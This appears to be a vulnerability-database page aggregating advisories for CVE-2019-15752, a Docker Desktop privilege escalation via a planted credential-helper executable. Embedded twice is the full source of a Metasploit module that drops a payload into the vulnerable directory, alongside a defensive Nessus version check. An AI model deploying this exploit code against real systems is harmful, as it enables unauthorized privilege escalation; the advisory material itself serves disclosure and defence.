Description
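Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\DockerDesktop\version-bin\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login'. Any of these actions invokes the credential helper, so the planted file runs with that user's privileges. The weakness is classified as CWE-732 (incorrect permission assignment for a critical resource): the version-bin directory accepts writes from low-privilege accounts. The fix is to upgrade to Docker Desktop 2.1.0.1 or later; on hosts that cannot be upgraded immediately, review the directory's ACL and any unexpected docker-credential-wincred.exe found in it.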
Affected Software
Related
{"id": "CVE-2019-15752", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2019-15752", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "published": "2019-08-28T21:15:00", "modified": "2020-08-31T14:15:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15752", "reporter": "cve@mitre.org", "references": ["https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e", "http://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"], 
"cvelist": ["CVE-2019-15752"], "immutableFields": [], "lastseen": "2022-03-23T21:04:31", "viewCount": 808, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:A1ACCD5B-C89E-4392-86ED-6C3DDC73AB47"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-15752"]}, {"type": "nessus", "idList": ["DOCKER_FOR_WINDOWS_CVE-2019-15752.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157404"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-15752"]}, {"type": "zdt", "idList": ["1337DAY-ID-34319"]}]}, "score": {"value": 4.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-15752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/DOCKER_CREDENTIAL_WINCRED"]}, {"type": "nessus", "idList": ["DOCKER_FOR_WINDOWS_CVE-2019-15752.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157404"]}, {"type": "zdt", "idList": ["1337DAY-ID-34319"]}]}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2019-15752"]}]}, "affected_software": {"major_version": [{"name": "docker", "version": 2}]}, "vulnersScore": 4.9}, "_state": {"dependencies": 1660004461, "score": 1659871106, "cisa_kev_wildexploited": 1660152412, "affected_software_major_version": 1671582767}, "_internal": {"score_hash": "06de72aaca98192627c3227ad177972f"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-732"], "affectedSoftware": [{"cpeName": "docker:docker", "version": "2.1.0.1", "operator": "lt", "name": "docker"}], "affectedConfiguration": [{"name": "microsoft windows", "cpeName": "microsoft:windows", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:docker:docker:2.1.0.1:*:*:*:community:*:*:*", "versionEndExcluding": "2.1.0.1", "cpe_name": []}]}, 
{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e", "name": "https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "name": "http://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "refsource": "MISC", "tags": []}, {"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", "name": "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", "refsource": "MLIST", "tags": []}]}
{"ubuntucve": [{"lastseen": "2022-08-04T13:37:42", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain\nprivileges by placing a Trojan horse docker-credential-wincred.exe file in\n%PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then\nwaiting for an admin or service user to authenticate with Docker, restart\nDocker, or run 'docker login' to force the command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-08-28T00:00:00", "type": "ubuntucve", "title": "CVE-2019-15752", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2019-08-28T00:00:00", "id": "UB:CVE-2019-15752", "href": "https://ubuntu.com/security/CVE-2019-15752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-01-20T17:07:46", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or 
service user to authenticate with Docker, restart Docker, or run \u2018docker login\u2019 to force the command.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-08-28T00:00:00", "type": "attackerkb", "title": "CVE-2019-15752", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2020-08-31T00:00:00", "id": "AKB:A1ACCD5B-C89E-4392-86ED-6C3DDC73AB47", "href": "https://attackerkb.com/topics/tIppilcgdb/cve-2019-15752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-20T19:42:31", "description": "This Metasploit module exploit leverages a vulnerability in Docker Desktop Community Edition versions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area to be executed automatically by the docker user at login.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-27T00:00:00", "type": "zdt", "title": "Docker Desktop Community Edition <= 2.1.0.1 Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2020-04-27T00:00:00", "id": "1337DAY-ID-34319", "href": "https://0day.today/exploit/description/34319", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Post::Windows::Priv\n include Post::Windows::Runas\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',\n 'Description' => %q{\n This exploit leverages a vulnerability in docker desktop\n community editions prior to 2.1.0.1 where an attacker can write\n a payload to a lower-privileged area to be executed\n automatically by the docker user at login.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Morgan Roman', # discovery\n 'bwatters-r7', # metasploit module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [[ 
'Automatic', {} ]],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'WfsDelay' => 15\n },\n 'DisclosureDate' => '2019-07-05',\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2019-15752'],\n ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']\n ]\n )\n )\n register_options(\n [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]\n )\n end\n\n def docker_version\n output = cmd_exec('cmd.exe', '/c docker -v')\n vprint_status(output)\n version_string = output.match(/(\\d+\\.)(\\d+\\.)(\\d)/)[0]\n Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))\n end\n\n def check\n if docker_version <= Gem::Version.new('18.09.0')\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n check_permissions!\n case get_uac_level\n when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,\n UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,\n UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT\n fail_with(Failure::NotVulnerable,\n \"UAC is set to 'Always Notify'. 
This module does not bypass this setting, exiting...\")\n when UAC_DEFAULT\n print_good('UAC is set to Default')\n print_good('BypassUAC can bypass this setting, continuing...')\n when UAC_NO_PROMPT\n print_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead')\n shell_execute_exe\n return\n end\n\n # make payload\n docker_path = expand_path(\"#{datastore['PROGRAMDATA']}\\\\DockerDesktop\\\\version-bin\")\n fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)\n payload_name = 'docker-credential-wincred.exe'\n payload_pathname = \"#{docker_path}\\\\#{payload_name}\"\n vprint_status('Making Payload')\n payload = generate_payload_exe\n\n # upload Payload\n vprint_status(\"Uploading Payload to #{payload_pathname}\")\n write_file(payload_pathname, payload)\n vprint_status('Payload Upload Complete')\n print_status('Waiting for user to attempt to login')\n end\n\n def check_permissions!\n unless check == Exploit::CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n fail_with(Failure::None, 'Already in elevated state') if is_admin? 
|| is_system?\n # Check if you are an admin\n # is_in_admin_group can be nil, true, or false\n end\nend\n", "sourceHref": "https://0day.today/exploit/34319", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Docker Desktop Community Edition Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-15752", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-04-27T23:20:27", "description": "", "cvss3": {}, 
"published": "2020-04-27T00:00:00", "type": "packetstorm", "title": "Docker-Credential-Wincred.exe Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-15752"], "modified": "2020-04-27T00:00:00", "id": "PACKETSTORM:157404", "href": "https://packetstormsecurity.com/files/157404/Docker-Credential-Wincred.exe-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Post::Windows::Priv \ninclude Post::Windows::Runas \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation', \n'Description' => %q{ \nThis exploit leverages a vulnerability in docker desktop \ncommunity editions prior to 2.1.0.1 where an attacker can write \na payload to a lower-privileged area to be executed \nautomatically by the docker user at login. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Morgan Roman', # discovery \n'bwatters-r7', # metasploit module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Targets' => [[ 'Automatic', {} ]], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'WfsDelay' => 15 \n}, \n'DisclosureDate' => '2019-07-05', \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ] \n}, \n'References' => [ \n['CVE', '2019-15752'], \n['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e'] \n] \n) \n) \nregister_options( \n[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])] \n) \nend \n \ndef docker_version \noutput = cmd_exec('cmd.exe', '/c docker -v') \nvprint_status(output) \nversion_string = output.match(/(\\d+\\.)(\\d+\\.)(\\d)/)[0] \nGem::Version.new(version_string.split('.').map(&:to_i).join('.')) \nend \n \ndef check \nif docker_version <= Gem::Version.new('18.09.0') \nreturn CheckCode::Appears \nend \n \nCheckCode::Safe \nend \n \ndef exploit \ncheck_permissions! \ncase get_uac_level \nwhen UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, \nUAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, \nUAC_PROMPT_CREDS, UAC_PROMPT_CONSENT \nfail_with(Failure::NotVulnerable, \n\"UAC is set to 'Always Notify'. 
This module does not bypass this setting, exiting...\") \nwhen UAC_DEFAULT \nprint_good('UAC is set to Default') \nprint_good('BypassUAC can bypass this setting, continuing...') \nwhen UAC_NO_PROMPT \nprint_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead') \nshell_execute_exe \nreturn \nend \n \n# make payload \ndocker_path = expand_path(\"#{datastore['PROGRAMDATA']}\\\\DockerDesktop\\\\version-bin\") \nfail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path) \npayload_name = 'docker-credential-wincred.exe' \npayload_pathname = \"#{docker_path}\\\\#{payload_name}\" \nvprint_status('Making Payload') \npayload = generate_payload_exe \n \n# upload Payload \nvprint_status(\"Uploading Payload to #{payload_pathname}\") \nwrite_file(payload_pathname, payload) \nvprint_status('Payload Upload Complete') \nprint_status('Waiting for user to attempt to login') \nend \n \ndef check_permissions! \nunless check == Exploit::CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable.') \nend \nfail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? \n# Check if you are an admin \n# is_in_admin_group can be nil, true, or false \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157404/docker_credential_wincred.rb.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:58:08", "description": "The version of Docker Desktop for Windows is prior to 2.1.0.1. 
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-15T00:00:00", "type": "nessus", "title": "Docker Desktop < 2.1.0.1 Privilege Escalation", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2022-01-20T00:00:00", "cpe": ["cpe:/a:docker:docker"], "id": "DOCKER_FOR_WINDOWS_CVE-2019-15752.NASL", "href": "https://www.tenable.com/plugins/nessus/155350", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155350);\n script_version(\"1.4\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2019-15752\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Docker Desktop < 2.1.0.1 Privilege Escalation\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application installed that is affected by a privilege escalation vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Docker Desktop for Windows is prior to 2.1.0.1. Docker Desktop Community Edition before 2.1.0.1 allows\nlocal users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in\n%PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to\nauthenticate with Docker, restart Docker, or run 'docker login' to force the command.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c485c1e\");\n # https://docs.docker.com/desktop/windows/release-notes/2.x/#docker-desktop-community-2101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbafae3b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Docker Desktop version 2.1.0.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-15752\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Docker-Credential-Wincred.exe Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:docker:docker\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"docker_for_windows_installed.nbin\");\n script_require_keys(\"installed_sw/Docker for Windows\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Docker for Windows', win_local:TRUE);\n\nvar constraints = [{'fixed_version':'2.1.0.1'}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-01-24T06:04:44", "description": "Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\\DockerDesktop\\version-bin\\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": 
"HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-08-28T21:15:00", "type": "debiancve", "title": "CVE-2019-15752", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15752"], "modified": "2019-08-28T21:15:00", "id": "DEBIANCVE:CVE-2019-15752", "href": "https://security-tracker.debian.org/tracker/CVE-2019-15752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}